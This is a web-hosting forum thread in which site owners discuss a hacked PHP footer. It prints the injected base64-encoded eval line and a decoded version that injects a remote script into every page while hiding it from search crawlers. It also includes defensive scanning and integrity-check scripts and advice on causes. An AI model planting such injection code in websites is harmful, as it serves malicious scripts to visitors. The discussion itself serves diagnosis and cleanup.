my site hacked by following php code

  #1  
Old
Newbie
 
Join Date: May 2009
Posts: 9



Some hacker inserted the following code into my footer.php,
and AVG told me about the threat. Thanks AVG.
Code:
<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5cGJtUmxjMmxuYm5OMGRXUnBiMmx1Wm04dVkyOXRMMnh6TG5Cb2NDSStQQzl6WTNKcGNIUSsiKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBN
TNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>
AVG reported the threat as:
http://www1.firesavez5.com/?p=p52dcW...iaiglnOdmps%3D

I found that code and deleted it from my file. But I don't know how the hacker inserted it into my PHP file?

Thanks,
Lei


Last edited by bear; 05-07-2010 at 09:55 AM.


  #2  
Old
Web Hosting Master
 
Join Date: Oct 2009
Posts: 816
Hard to say without more background information. It could be due to weak security on a shared hosting server, a compromised server, or a weakness in your web applications.

Just for fun, here's that chunk decoded and cleaned up somewhat.

Code:
// Runs once per request: the global marker stops the hook being installed twice.
if(function_exists('ob_start') && !isset($GLOBALS['mr_no'])) {
	$GLOBALS['mr_no']=1;

	if(!function_exists('mrobh')) {
		// Returns the injected <script> tag, but not to Google or Yahoo crawlers,
		// so the site keeps looking clean to search engines.
		if(!function_exists('gml')) {
			function gml() {
				if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot") && (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))) {
					return '<script src="http://indesignstudioinfo.com/ls.php"></script>';
				}

				return "";
			}
		}

		// Fallback gzdecode() for PHP builds that lack it: reads the gzip header
		// flag byte (FEXTRA=4, FNAME=8, FCOMMENT=16, FHCRC=2) to find where the
		// deflate stream starts, so gzip-compressed page output can still be edited.
		if(!function_exists('gzdecode')) {
			function gzdecode($var1) {
				$var3=@ord(@substr($var1,3,1));
				$var2=10;

				if($var3&4) {
					$var4=@unpack('v',substr($var1,10,2));
					$var4=$var4[1];
					$var2+=2+$var4;
				}

				if($var3&8) {
					$var2=@strpos($var1,chr(0),$var2)+1;
				}

				if($var3&16) {
					$var2=@strpos($var1,chr(0),$var2)+1;
				}

				if($var3&2) {
					$var2+=2;
				}

				$var5=@gzinflate(@substr($var1,$var2));

				// Not gzip after all: pass the buffer through unchanged.
				if($var5===FALSE) {
					$var5=$var1;
				}

				return $var5;
			}
		}

		// Output-buffer callback: decompress the captured page, then splice the
		// script tag in just before </body>, or append it if there is no </body>.
		function mrobh($var6) {
			Header('Content-Encoding: none');
			$var7=gzdecode($var6);

			if(preg_match('/\<\/body/si',$var7)) {
				return preg_replace('/(\<\/body[^\>]*\>)/si', gml()."\n".'$1', $var7);
			} else {
				return $var7.gml();
			}
		}

		ob_start('mrobh');
	}
}
It's basically using an output buffer to capture the generated page, then injects an external script before the </body> tag.
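The decoded code above is what the one-liner hides; the practical question for anyone cleaning up is how to find every copy of it. Here is a read-only scanner, added as an example and not code from the thread, that walks a web root, flags PHP files containing an eval(base64_decode("...")) call, and decodes the payload (and any base64 string nested inside it, like the <script> tag gml() returned) for inspection without ever executing it. The directory layout and the sample "infected" file are constructed inside the script; the example.invalid hostname is a placeholder.

```php
<?php
// Added example, not code from the thread: detect and decode (never run)
// prepended eval(base64_decode("...")) lines like the one in post #1.

function decode_nested(string $code): array {
    // Recover strings hidden one level deeper, e.g. the base64-encoded
    // <script> tag that the decoded gml() function returned.
    $found = [];
    if (preg_match_all('/base64_decode\s*\(\s*[\'"]([A-Za-z0-9+\/=]+)[\'"]\s*\)/', $code, $m)) {
        foreach ($m[1] as $b64) {
            $inner = base64_decode($b64, true);   // strict: reject non-base64
            if ($inner !== false) $found[] = $inner;
        }
    }
    return $found;
}

function scan_file(string $path): array {
    $src = file_get_contents($path);
    if ($src === false) return [];
    $hits = [];
    $re = '/eval\s*\(\s*base64_decode\s*\(\s*[\'"]([A-Za-z0-9+\/=]+)[\'"]\s*\)\s*\)/';
    if (preg_match_all($re, $src, $m, PREG_OFFSET_CAPTURE)) {
        foreach ($m[1] as $i => $cap) {
            $payload = base64_decode($cap[0], true);
            $hits[] = [
                'file'    => $path,
                // line number of the match, for the cleanup report
                'line'    => substr_count($src, "\n", 0, $m[0][$i][1]) + 1,
                'payload' => $payload === false ? '(not valid base64)' : $payload,
                'nested'  => $payload === false ? [] : decode_nested($payload),
            ];
        }
    }
    return $hits;
}

function scan_tree(string $root): array {
    $hits = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $f) {
        if (strtolower($f->getExtension()) === 'php') {
            $hits = array_merge($hits, scan_file($f->getPathname()));
        }
    }
    return $hits;
}

// --- constructed demo tree with one "infected" file (harmless stand-in) ---
$root = sys_get_temp_dir() . '/scan_demo_' . getmypid();
mkdir("$root/inc", 0700, true);
// Same shape as the real payload (nested base64 <script>), but inert and
// pointing at a reserved placeholder host.
$inner   = base64_encode('<script src="http://example.invalid/ls.php"></script>');
$payload = 'if(!isset($GLOBALS["mr_no"])){ $GLOBALS["mr_no"]=1; $s=base64_decode("' . $inner . '"); }';
file_put_contents("$root/inc/footer.php",
    '<?php /**/ eval(base64_decode("' . base64_encode($payload) . '"));?>' . "\n<footer>site</footer>\n");
file_put_contents("$root/index.php", "<?php\ninclude 'inc/footer.php';\n");

foreach (scan_tree($root) as $h) {
    printf("%s:%d\n  payload: %s\n", $h['file'], $h['line'], substr($h['payload'], 0, 80));
    foreach ($h['nested'] as $n) printf("  nested : %s\n", $n);
}

// remove the demo tree again
unlink("$root/inc/footer.php"); unlink("$root/index.php"); rmdir("$root/inc"); rmdir($root);
```

Point it at the real document root instead of the demo tree and the report tells you which files to restore from a clean backup; the decoded payload shows what the attacker intended (here, which external script was being loaded) without giving it a chance to run.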

  #3  
Old
New Member
 
Join Date: May 2010
Posts: 1
Lei,

Same thing happened to me today. Every single PHP file on my server had that same line of code entered in it. I'm not sure how it happened or how to prevent it from happening again.

Garret

  #4  
Old
Newbie
 
Join Date: Oct 2004
Posts: 13
I'm sure there are several approaches to getting this done. I'm no expert in this, but one of my "clients" had this problem, and each time he removed it, it was back the next day.
It turned out that when I went over his folders and files and set the correct permissions, the problem stopped. For more info have a look at http://en.wikipedia.org/wiki/Chmod

__________________
Adtug.com

  #5  
Old
Web Hosting Guru
 
Join Date: Nov 2005
Posts: 268
chmod is only protecting files from being modified by whatever method is being used. It isn't actually plugging the security vulnerability that allowed it in the first place. Also, chmod won't help you if your script is vulnerable to injection by itself (and the permission the script is running under has write access), unless you set the files to read/execute only.

Ideally, shared hosting environments should not allow users to modify other files on the server outside of their root path; if this is not the case, trouble your host to correct it. If they aren't locked out of other users' directories, it will be possible for them to do possibly more things than inject a snippet of code into a PHP script, including obtaining usernames and passwords to your database stored in plaintext configuration files.

  #6  
Old
Newbie
 
Join Date: Oct 2004
Posts: 13
Thank you for clearing that up...

__________________
Adtug.com

  #7  
Old
Newbie
 
Join Date: Apr 2010
Posts: 25
The most common method I have seen is the FTP credentials becoming compromised. This can be through brute force, especially with the commonly weak passwords most people use, or just through poor credential management (do you have yours on a sticky note attached to your monitor?). Make sure you approach the host about this issue and have *all* of your credentials changed, including FTP, shell access, control panel, etc. Any method configured for you to access the server should be updated with new credentials. Then go back through your content and remove the scripting.

  #8  
Old
Newbie
 
Join Date: May 2009
Posts: 9

  #9  
Old
Web Hosting Master
 
Join Date: Oct 2009
Posts: 816
chmod will only help you if you're on a weakly secured shared hosting server, in the sense that it can stop other people on the server from changing your files. But if your host doesn't work with the files being owned by your own account, other people will still be able to read them, and extract things like database credentials which they can then use to access your database.

It's a jungle out there.

  #10  
Old
Junior Guru
 
Join Date: May 2010
Location: Online
Posts: 233
Same thing happened for one of my clients; each file of his WordPress installation got that dump inside at the beginning. We found a PHP script that cleans up all files and also removes empty lines:
tutorialsbay.com/wordpress-hacked-malware-redirect/

  #11  
Old
Newbie
 
Join Date: Jan 2010
Location: London
Posts: 10
Possibly a PHP Shell?

  #12  
Old
New Member
 
Join Date: Jun 2010
Posts: 1
I think this is weak security of file manager or picture manager plugins in WYSIWYG editors like TinyMCE.
Here is our case in an old Mambo CMS installation:
lampwebdevelopers.com/199/web-developement/security-and-anti-spam/website-hack-through-tinymce-filemanager-plugin/

  #13  
Old
Disabled
 
Join Date: Apr 2009
Posts: 3,255
Make sure you ask your host to update your cPanel and PHP/MySQL. Make sure that you update your PHP scripts as well. Unfortunately, a lot of hosts probably don't follow the proper security procedures, from what I have seen. As always, back up your site every week at least.

  #14  
Old
Newbie
 
Join Date: Oct 2010
Posts: 5
The people who create this code and hack it onto people's site are the most despicable of all internet criminals.

I believe I have a simple solution to this problem, at least to stop this scum from hurting your customers.

Their script finds every PHP file and prepends a chunk of PHP.

So use that against them. Include in every page as you would functions of a config file. If it's not in the same directory as your index file, obviously change the code to fit.

Code:
<?php

# this file should be less than 570 chars in length

$expected=570;

// read this file's own source; anything prepended to it makes it longer
$data=file_get_contents(__FILE__);

//echo strlen($data);

if (strlen($data)>$expected)
{
	//mail('youremail','Website compromised '.$_SERVER['HTTP_HOST'],'taken offline','FROM: youremail');
	if (!file_exists('index.phpx')) rename('index.php','index.phpx');
	// write this despite the existence of index.phpx in case they strike again
	$fh = fopen('index.php', 'w') or die("can't open file");
	fwrite($fh, 'Sorry, we are currently offline');
	fclose($fh);
}

?>
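The self-check above catches the prepend by watching one file's byte length. A more general form of the same idea, added here as an example and not the poster's code, keeps a manifest of SHA-256 hashes for every PHP file under the web root and compares against it: any change to any file shows up whatever its size, files dropped into the tree show up as "added", and deleted files as "missing". The directory tree, the manifest path and the tampering in the demo are all constructed inside the script.

```php
<?php
// Added example, not the poster's code: hash-manifest integrity check for a
// PHP tree. Keep the manifest outside the document root (it must not be
// writable by the web server user, or an intruder can simply regenerate it).

function php_files(string $root): array {
    // map of relative path => sha256 for every *.php file under $root
    $out = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $f) {
        if (strtolower($f->getExtension()) === 'php') {
            $rel = substr($f->getPathname(), strlen($root) + 1);
            $out[$rel] = hash_file('sha256', $f->getPathname());
        }
    }
    ksort($out);
    return $out;
}

function write_manifest(string $root, string $manifest): void {
    file_put_contents($manifest, json_encode(php_files($root), JSON_PRETTY_PRINT));
}

function verify_manifest(string $root, string $manifest): array {
    $expected = json_decode((string) file_get_contents($manifest), true) ?: [];
    $actual   = php_files($root);
    $modified = $missing = $added = [];
    foreach ($expected as $path => $hash) {
        if (!isset($actual[$path]))       $missing[]  = $path;
        elseif ($actual[$path] !== $hash) $modified[] = $path;
    }
    foreach ($actual as $path => $hash) {
        if (!isset($expected[$path]))     $added[]    = $path;
    }
    return ['modified' => $modified, 'missing' => $missing, 'added' => $added];
}

// --- constructed demo ---
$root     = sys_get_temp_dir() . '/manifest_demo_' . getmypid();
$manifest = sys_get_temp_dir() . '/manifest_demo_' . getmypid() . '.json';  // outside $root
mkdir("$root/inc", 0700, true);
file_put_contents("$root/index.php",      "<?php\ninclude 'inc/footer.php';\n");
file_put_contents("$root/inc/footer.php", "<?php\necho '<footer>site</footer>';\n");

// 1. baseline taken while the site is known clean
write_manifest($root, $manifest);

// 2. simulate the attack pattern from the thread: prepend a line to one file
//    and drop a new file into the tree (inert placeholder content)
file_put_contents("$root/inc/footer.php",
    "<?php /**/ /* prepended placeholder */ ?>" . file_get_contents("$root/inc/footer.php"));
file_put_contents("$root/dropped.php", "<?php /* placeholder for a dropped file */\n");

// 3. verify: footer.php is reported modified, dropped.php as added
$report = verify_manifest($root, $manifest);
foreach ($report as $kind => $paths) {
    printf("%-8s %s\n", $kind . ':', $paths ? implode(', ', $paths) : '-');
}
$compromised = $report['modified'] || $report['missing'] || $report['added'];
echo $compromised ? "integrity check FAILED\n" : "integrity check ok\n";

// clean up the demo tree
foreach (["$root/inc/footer.php", "$root/index.php", "$root/dropped.php", $manifest] as $p) unlink($p);
rmdir("$root/inc"); rmdir($root);
```

Run write_manifest once right after a clean deploy, and verify_manifest from a cron job or a hosting-panel scheduled task; when it fails, the report lists exactly which files to restore, which is the information the single-file length check cannot give you. Taking the site offline as the poster's script does is still a reasonable automatic response, but the manifest tells you where to look afterwards.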

  #15  
Old
Aspiring Evangelist
 
Join Date: Aug 2009
Location: United Kingdom
Posts: 388
You can infect every page on a website with a PHP shell if they haven't secured PHP
